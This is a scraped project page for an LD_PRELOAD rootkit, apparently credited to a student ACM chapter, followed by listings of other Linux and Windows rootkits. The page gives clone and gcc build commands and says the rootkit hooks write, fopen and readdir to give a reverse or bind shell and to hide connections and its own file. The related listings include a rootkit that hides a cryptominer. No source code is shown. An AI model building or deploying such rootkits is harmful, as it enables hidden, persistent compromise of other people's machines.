LD_PRELOAD Rootkit

Overview

LD_PRELOAD Rootkit

made-with-C

How To Compile It ?

  • Using Makefile
$ git clone https://github.com/acm-iem/LD_PRELOAD-Rootkit
$ cd LD_PRELOAD-Rootkit
$ make
  • Using GCC
$ gcc smoochum.c -fPIC -shared -D_GNU_SOURCE -o libc.man.so.6 -ldl

Let's break down the command :

  • gcc : Our very own GNU Compiler Collection
  • smoochum.c : The name of our program (Get the pokemon refernce ?)
  • -fPIC : Generate position-independent code
  • shared : Create a Shared Object which can be linked with other objects to produce an executable
  • -D_GNU_SOURCE : It is specified to satisfy #ifdef conditions that allow us to use the RTLD_NEXT enum. Optionally this flag can be replaced by adding #define _GNU_SOURCE
  • -o : Create an output file
  • libc.man.so.6 : Name of output file
  • -ldl : Link against libdl

Functions Hooked :

  • ssize_t write(int fd, const void *buf, size_t count) : To Provide Reverse or Bind Shell as per trigger
  • FILE *fopen(const char *pathname, const char *mode); To Hide netstat and lsof connections
  • struct dirent *readdir(DIR *dirp); : To Hide our so file from ls

Note : The variants of these functions are provided incase the file sizes are large

To-Do :

  • Add SSL Encryption
  • Test and Debug IPv6 compatibilty
  • Hide our Shared Object from ldd
  • MORE !
Owner
ACM | CSI IEM
ACM’s Professional and Student chapters worldwide serve as hubs of activity for ACM members and the computing community at large. They provide seminars, lecture
ACM | CSI IEM
LKM Rootkit Kernel 2016 (Updated)

SIG SIG is a Linux kernel rootkit that comes as a single LKM (Loadable Kernel Module) and it is totally restricted to kernel 2.6.32. The rootkit is de

null 1 Apr 3, 2022
64-bit LKM Rootkit builder based on yaml prescription

1337kit - LKM Rootkit Builder About project 1337kit is 64-bit LKM Rootkit builder based on yaml prescription Fully tested on: Linux 5.11.0-34-generic

Lukas Balazik 16 Jul 17, 2022
4.8 Rootkit Kernel LKM

4.8 Rootkit Kernel "Eu vou instalar módulos em você e vou fazer o que eu quiser!!!!" - Disse o (SER) Sigma's Rootkit Kernel para o Kernel 4.8 (Ainda c

null 0 Apr 3, 2022
Hide a process,port,self under Linux using the ld_preload

vbackdoor 中文 Hide a process,port,self under Linux using the LD_PRELOAD rootkit. compile the library git clone https://github.com/veo/vbackdoor.git cd

veo 88 Aug 8, 2022
An attempt to restore and adapt to modern Win10 version the Rootkit Arsenal original code samples

rootkit-arsenal-guacamole An attempt to restore and adapt to modern Win10 version the Rootkit Arsenal original code samples All projects have been por

Matteo Malvica 51 Jul 25, 2022
The LKM rootkit working in Linux Kernels 2.6.x/3.x/4.x/5.x

BrokePkg Brokepkg is a LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x and ARM64, with suport after kernel 5.7, without kallsyms_lookup_name. Tested o

Jorge Buzeti 95 Jul 27, 2022
Windows x64 rootkit

P4tch3r Windows x64 rootkit (tested on Windows 7) It's PoC of patching NtTerminateProcess function by just overwriting instructions catching arguments

null 7 Jul 22, 2022
A LKM rootkit targeting 4.x and 5.x kernel versions which opens a backdoor that can be used to spawn a reverse shell to a remote host and more.

Umbra Umbra (/ˈʌmbrə/) is an experimental LKM rootkit for kernels 4.x and 5.x (up to 5.7) which opens a network backdoor that spawns reverse shells to

Marcos S. Bajo 83 Jul 26, 2022
Linux rootkit used to hide a cryptominer process and CPU usage.

Linux rootkit used to hide a cryptominer process and CPU usage.

Alfon 38 Aug 7, 2022
LKM Rootkit Kernel 2016 (Updated)

SIG SIG is a Linux kernel rootkit that comes as a single LKM (Loadable Kernel Module) and it is totally restricted to kernel 2.6.32. The rootkit is de

null 1 Apr 3, 2022
64-bit LKM Rootkit builder based on yaml prescription

1337kit - LKM Rootkit Builder About project 1337kit is 64-bit LKM Rootkit builder based on yaml prescription Fully tested on: Linux 5.11.0-34-generic

Lukas Balazik 16 Jul 17, 2022
A simple Windows kernel rootkit.

Venom RootKit A simple windows rootkit that I have wrote, In order to explore a bit about the world of rootkits and windows kernel in general. The Ven

Amit Schendel 58 Jul 22, 2022
yark - Yet Another RootKit

yark - Yet Another RootKit How to Build Requirements In order to build the kernel module, you need to install the kernel-headers package corresponding

imlk 16 Jun 21, 2022
4.8 Rootkit Kernel LKM

4.8 Rootkit Kernel "Eu vou instalar módulos em você e vou fazer o que eu quiser!!!!" - Disse o (SER) Sigma's Rootkit Kernel para o Kernel 4.8 (Ainda c

null 0 Apr 3, 2022